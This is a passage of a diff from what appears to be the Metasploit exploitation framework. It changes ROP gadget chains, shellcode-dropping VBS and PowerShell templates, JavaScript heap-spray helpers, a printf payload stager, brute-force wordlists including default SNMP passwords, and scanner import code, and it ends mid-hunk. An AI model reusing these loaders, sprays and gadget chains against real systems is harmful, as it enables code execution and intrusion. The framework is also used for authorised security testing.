<gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
@ -40,7 +40,7 @@
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget>
<gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget>

2
data/ropdb/java.xml
View File

@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget>
<gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget>

2
data/ropdb/msvcrt.xml
View File

@ -8,7 +8,7 @@
<gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="0xFFFFFBFF">0xFFFFFBFF -> ebx</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>

13
data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238
View File

@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 26
https://metasploit.com:443
END

13
data/svn/auth/svn.ssl.server/ae6796767fe833f43e1aac5614a3f229
View File

@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 30
https://www.metasploit.com:443
END

8
data/templates/scripts/to_exe.vbs.template
View File

@ -1,5 +1,5 @@
Function %{var_func}()
%{var_shellcode}
%{var_shellcode} = "%{hex_shellcode}"
Dim %{var_obj}
Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
@ -10,9 +10,11 @@ Function %{var_func}()
Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
%{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
%{var_obj}.CreateFolder(%{var_basedir})
%{var_tempexe} = %{var_basedir} & "\" & "svchost.exe"
%{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
%{var_stream}.Write %{var_bytes}
For i = 1 to Len(%{var_shellcode}) Step 2
%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
Next
%{var_stream}.Close
Dim %{var_shell}
Set %{var_shell} = CreateObject("Wscript.Shell")

2
data/templates/scripts/to_mem_dotnet.ps1.template
View File

@ -20,7 +20,7 @@ $%{var_compileParams}.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].A
$%{var_compileParams}.GenerateInMemory = $True
$%{var_output} = $%{var_codeProvider}.CompileAssemblyFromSource($%{var_compileParams}, $%{var_syscode})
%{shellcode}
[Byte[]]$%{var_code} = [System.Convert]::FromBase64String("%{b64shellcode}")
$%{var_baseaddr} = [%{var_kernel32}.func]::VirtualAlloc(0, $%{var_code}.Length + 1, [%{var_kernel32}.func+AllocationType]::Reserve -bOr [%{var_kernel32}.func+AllocationType]::Commit, [%{var_kernel32}.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$%{var_baseaddr}) { $global:result = 3; return }

1
data/wordlists/http_owa_common.txt
View File

@ -1,5 +1,6 @@
aspnet_client/
Autodiscover/
exchange/
ecp/
EWS/
Microsoft-Server-ActiveSync/

2
data/wordlists/sap_icm_paths.txt
View File

@ -1,3 +1,4 @@
/AdapterFramework/version/version.jsp
/AdobeDocumentServices/Config
/AdobeDocumentServices/Config?wsdl
/AE/index.jsp
@ -319,6 +320,7 @@
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwl
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldetail
/webdynpro/dispatcher/sap.com/tc~kmc~bc.uwl.ui~wd_ui/uwldisplayhistory
/webdynpro/dispatcher/sap.com/tc~slm~ui_lup/LUP
/webdynpro/dispatcher/sap.com/tc~wd~dispwda/servlet_jsp/webdynpro/welcome/root/Welcome.jsp
/webdynpro/dispatcher/sap.com/tc~wd~tools
/webdynpro/dispatcher/sap.com/tc~wd~tools/explorer

1
data/wordlists/snmp_default_pass.txt
View File

@ -92,6 +92,7 @@ root
router
rw
rwa
s!a@m#n$p%c
san-fran
sanfran
scotty

82
lib/msf/core/auxiliary/jtr.rb
View File

@ -32,50 +32,62 @@ module Auxiliary::JohnTheRipper
)
@run_path = nil
@john_path = ::File.join(Msf::Config.install_root, "data", "john")
@john_path = ::File.join(Msf::Config.data_directory, "john")
autodetect_platform
end
# @return [String] the run path instance variable if the platform is detectable, nil otherwise.
def autodetect_platform
cpuinfo_base = ::File.join(Msf::Config.install_root, "data", "cpuinfo")
return @run_path if @run_path
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
if File.directory?(cpuinfo_base)
data = nil
case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/
data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil
case data
when /sse2/
@run_path ||= "run.win32.sse2/john.exe"
when /mmx/
@run_path ||= "run.win32.mmx/john.exe"
else
@run_path ||= "run.win32.any/john.exe"
end
when /x86_64-linux/
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil
data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil
case data
when /mmx/
@run_path ||= "run.linux.x64.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
when /i[\d]86-linux/
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil
data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/
fname = "#{cpuinfo_base}/cpuinfo.exe"
if File.exists?(fname) and File.executable?(fname)
data = %x{"#{fname}"} rescue nil
end
case data
when /sse2/
@run_path ||= "run.win32.sse2/john.exe"
when /mmx/
@run_path ||= "run.win32.mmx/john.exe"
else
@run_path ||= "run.win32.any/john.exe"
end
when /x86_64-linux/
fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
if File.exists? fname
::FileUtils.chmod(0755, fname) rescue nil
data = %x{"#{fname}"} rescue nil
end
case data
when /mmx/
@run_path ||= "run.linux.x64.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
when /i[\d]86-linux/
fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
if File.exists? fname
::FileUtils.chmod(0755, fname) rescue nil
data = %x{"#{fname}"} rescue nil
end
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
end
end
@run_path
return @run_path
end
def john_session_id

2
lib/msf/core/auxiliary/mime_types.rb
View File

@ -23,7 +23,7 @@ module Auxiliary::MimeTypes
end
def mime_load_extension_map
path = File.join( Msf::Config.install_root, "data", "mime.yml")
path = File.join( Msf::Config.data_directory, "mime.yml")
@extension_map = YAML.load_file(path)
end

38
lib/msf/core/db.rb
View File

@ -41,6 +41,7 @@ require 'rex/parser/nexpose_simple_nokogiri'
require 'rex/parser/nmap_nokogiri'
require 'rex/parser/openvas_nokogiri'
require 'rex/parser/wapiti_nokogiri'
require 'rex/parser/outpost24_nokogiri'
# Legacy XML parsers -- these will be converted some day
require 'rex/parser/ip360_aspl_xml'
@ -2926,7 +2927,7 @@ class DBManager
# Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml
# :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog
# :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml
# :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml
# :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml
# If there is no match, an error is raised instead.
def import_filetype_detect(data)
@ -3059,6 +3060,9 @@ class DBManager
@import_filedata[:type] = "CI"
return :ci_xml
end
when "main"
@import_filedata[:type] = "Outpost24 XML"
return :outpost24_xml
else
# Give up if we haven't hit the root tag in the first few lines
break if line_count > 10
@ -3649,7 +3653,7 @@ class DBManager
data = ::File.open(args[:filename], "rb") {|f| f.read(f.stat.size)}
wspace = args[:wspace] || args['wspace'] || workspace
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.install_root, "data", "msf")
basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.data_directory, "msf")
allow_yaml = false
btag = nil
@ -5923,6 +5927,36 @@ class DBManager
parser.parse(args[:data])
end
def import_outpost24_xml(args={}, &block)
bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
wspace = args[:wspace] || workspace
if Rex::Parser.nokogiri_loaded
parser = "Nokogiri v#{::Nokogiri::VERSION}"
noko_args = args.dup
noko_args[:blacklist] = bl
noko_args[:wspace] = wspace
if block
yield(:parser, parser)
import_outpost24_noko_stream(noko_args) {|type, data| yield type,data}
else
import_outpost24_noko_stream(noko_args)
end
return true
else # Sorry
raise DBImportError.new("Could not import due to missing Nokogiri parser. Try 'gem install nokogiri'.")
end
end
def import_outpost24_noko_stream(args={},&block)
if block
doc = Rex::Parser::Outpost24Document.new(args,framework.db) {|type, data| yield type,data }
else
doc = Rex::Parser::Outpost24Document.new(args,self)
end
parser = ::Nokogiri::XML::SAX::Parser.new(doc)
parser.parse(args[:data])
end
def unserialize_object(xml_elem, allow_yaml = false)
return nil unless xml_elem

0
lib/msf/core/encoded_payload.rb Executable file → Normal file
View File

2
lib/msf/core/exploit/cmdstager_debug_asm.rb
View File

@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugAsm
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe assembly listing decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]),
], self.class)
end

2
lib/msf/core/exploit/cmdstager_debug_write.rb
View File

@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugWrite
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The debug.exe file-writing decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]),
], self.class)
end

27
lib/msf/core/exploit/cmdstager_printf.rb Normal file
View File

@ -0,0 +1,27 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
#
# This stager uses a POSIX-conformant printf, that supports the interpretation
# of octal escapes, to drop an ELF with the payload embedded to disk.
####
module Exploit::CmdStagerPrintf
include Msf::Exploit::CmdStager
# Initializes a CmdStagerPrintf instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerPrintf.new(exe)
end
end
end

2
lib/msf/core/exploit/cmdstager_vbs.rb
View File

@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]),
], self.class)
end

2
lib/msf/core/exploit/cmdstager_vbs_adodb.rb
View File

@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS::ADODB
register_advanced_options(
[
OptString.new( 'DECODERSTUB', [ true, 'The VBS base64 file decoder stub to use.',
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]),
File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]),
], self.class)
end

11
lib/msf/core/exploit/file_dropper.rb
View File

@ -47,19 +47,18 @@ module Exploit::FileDropper
false
end
else
cmds = [
win_cmds = [
%Q|attrib.exe -r "#{win_file}"|,
%Q|del.exe /f /q "#{win_file}"|,
%Q|rm -f "#{file}" >/dev/null|,
]
%Q|del.exe /f /q "#{win_file}"|
]
# We need to be platform-independent here. Since we can't be
# certain that {#target} is accurate because exploits with
# automatic targets frequently change it, we just go ahead and
# run both a windows and a unixy command in the same line. One
# of them will definitely fail and the other will probably
# succeed. Doing it this way saves us an extra round-trip.
session.shell_command_token(cmds.join(" ; "))
# Trick shared by @mihi42
session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
print_good("Deleted #{file}")
true
end

289
lib/msf/core/exploit/http/server.rb
View File

@ -3,6 +3,7 @@ require 'rex/service_manager'
require 'rex/exploitation/obfuscatejs'
require 'rex/exploitation/encryptjs'
require 'rex/exploitation/heaplib'
require 'rex/exploitation/js'
module Msf
@ -677,6 +678,14 @@ protected
OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]),
OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)', 0]),
], Exploit::Remote::HttpServer::HTML)
# Cache Javascript
@cache_base64 = nil
@cache_ajax_download = nil
@cache_mstime_malloc = nil
@cache_property_spray = nil
@cache_heap_spray = nil
@cache_os_detect = nil
end
#
@ -708,146 +717,7 @@ protected
end
def js_base64
js = <<-ENDJS
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
// variable names changed to make obfuscation easier
var Base64 = {
// private property
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
// private method
_utf8_encode : function ( input ){
input = input.replace(/\\r\\n/g,"\\n");
var utftext = "";
var input_idx;
for (input_idx = 0; input_idx < input.length; input_idx++) {
var chr = input.charCodeAt(input_idx);
if (chr < 128) {
utftext += String.fromCharCode(chr);
}
else if((chr > 127) && (chr < 2048)) {
utftext += String.fromCharCode((chr >> 6) | 192);
utftext += String.fromCharCode((chr & 63) | 128);
} else {
utftext += String.fromCharCode((chr >> 12) | 224);
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
utftext += String.fromCharCode((chr & 63) | 128);
}
}
return utftext;
},
// public method for encoding
encode : function( input ) {
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var input_idx = 0;
input = Base64._utf8_encode(input);
while (input_idx < input.length) {
chr1 = input.charCodeAt( input_idx++ );
chr2 = input.charCodeAt( input_idx++ );
chr3 = input.charCodeAt( input_idx++ );
enc1 = chr1 >> 2;
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
enc4 = chr3 & 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
}
return output;
},
// public method for decoding
decode : function (input) {
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\\+\\/\\=]/g, "");
while (i < input.length) {
enc1 = this._keyStr.indexOf(input.charAt(i++));
enc2 = this._keyStr.indexOf(input.charAt(i++));
enc3 = this._keyStr.indexOf(input.charAt(i++));
enc4 = this._keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = Base64._utf8_decode(output);
return output;
},
_utf8_decode : function (utftext) {
var string = "";
var input_idx = 0;
var chr1 = 0;
var chr2 = 0;
var chr3 = 0;
while ( input_idx < utftext.length ) {
chr1 = utftext.charCodeAt(input_idx);
if (chr1 < 128) {
string += String.fromCharCode(chr1);
input_idx++;
}
else if((chr1 > 191) && (chr1 < 224)) {
chr2 = utftext.charCodeAt(input_idx+1);
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
input_idx += 2;
} else {
chr2 = utftext.charCodeAt(input_idx+1);
chr3 = utftext.charCodeAt(input_idx+2);
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
input_idx += 3;
}
}
return string;
}
};
ENDJS
opts = {
'Symbols' => {
'Variables' => %w{ Base64 encoding result _keyStr encoded_data utftext input_idx
input output chr chr1 chr2 chr3 enc1 enc2 enc3 enc4 },
'Methods' => %w{ _utf8_encode _utf8_decode encode decode }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
return js
@cache_base64 ||= Rex::Exploitation::Js::Utils.base64
end
@ -870,34 +740,7 @@ protected
# </script>
#
def js_ajax_download
%Q|function ajax_download(oArg) {
method = oArg.method;
path = oArg.path;
data = oArg.data;
if (method == undefined) { method = "GET"; }
if (method == path) { throw "Missing parameter 'path'"; }
if (data == undefined) { data = null; }
if (window.XMLHttpRequest) {
xmlHttp = new XMLHttpRequest();
}
else {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
}
if (xmlHttp.overrideMimeType) {
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
}
xmlHttp.open(method, path, false);
xmlHttp.send(data);
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
return xmlHttp.responseText;
}
return null;
}
|
@cache_ajax_download ||= Rex::Exploitation::Js::Network.ajax_download
end
@ -933,39 +776,7 @@ protected
# </script>
#
def js_mstime_malloc
%Q|
function mstime_malloc(oArg) {
shellcode = oArg.shellcode;
offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize;
objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0; }
if (heapBlockSize == undefined) { throw "Size must be defined"; }
buf = "";
for (i=0; i < heapBlockSize/4; i++) {
if (i == offset) {
if (i == 0) { buf += shellcode; }
else { buf += ";" + shellcode; }
}
else {
buf += ";##{Rex::Text.rand_text_hex(6)}";
}
}
e = document.getElementById(objId);
if (e == null) {
eleId = "#{Rex::Text.rand_text_alpha(5)}"
acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}
|
@cache_mstime_malloc ||= Rex::Exploitation::Js::Memory.mstime_malloc
end
#
@ -984,90 +795,22 @@ protected
#
# Example of using the 'sprayHeap' function:
# <script>
# #{spray}
# #{js_property_spray}
#
# var s = unescape("%u4141%u4141%u4242%u4242%u4343%u4343%u4444%u4444");
# sprayHeap({shellcode:s, heapBlockSize:0x80000});
# </script>
#
def js_property_spray
sym_div_container = Rex::Text.rand_text_alpha(rand(10) + 5)
js = %Q|
var #{sym_div_container};
function sprayHeap( oArg ) {
shellcode = oArg.shellcode;
offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize;
maxAllocs = oArg.maxAllocs;
objId = oArg.objId;
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
if (offset == undefined) { offset = 0x00; }
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
if (maxAllocs == undefined) { maxAllocs = 0x350; }
if (offset > 0x800) { throw "Bad alignment"; }
#{sym_div_container} = document.getElementById(objId);
if (#{sym_div_container} == null) {
#{sym_div_container} = document.createElement("div");
}
#{sym_div_container}.style.cssText = "display:none";
var data;
junk = unescape("%u2020%u2020");
while (junk.length < offset+0x1000) junk += junk;
data = junk.substring(0,offset) + shellcode;
data += junk.substring(0,0x800-offset-shellcode.length);
while (data.length < heapBlockSize) data += data;
for (var i = 0; i < maxAllocs; i++)
{
var obj = document.createElement("button");
obj.title = data.substring(0, (heapBlockSize-2)/2);
#{sym_div_container}.appendChild(obj);
}
}
|
@cache_property_spray ||= Rex::Exploitation::Js::Memory.property_spray
end
def js_heap_spray
js = %Q|var memory = new Array();
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
var index;
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
for (index = 0; index < heapBlockCnt; index++) {
memory[index] = retSlide + shellcode;
}
}
|
opts = {
'Symbols' => {
'Variables' => %w{ shellcode retSlide payLoadSize memory index
heapSprayAddr_lo heapSprayAddr_hi heapSprayAddr heapBlockSize
heapBlockCnt },
'Methods' => %w{ sprayHeap }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
return js
@cache_heap_spray ||= Rex::Exploitation::Js::Memory.heap_spray
end
def js_os_detect
return ::Rex::Exploitation::JavascriptOSDetect.new
@cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os
end
# Transmits a html response to the supplied client

2
lib/msf/core/exploit/java.rb
View File

@ -51,7 +51,7 @@ module Exploit::Java
# Instantiate the JVM with a classpath pointing to the JDK tools.jar
# and our javatoolkit jar.
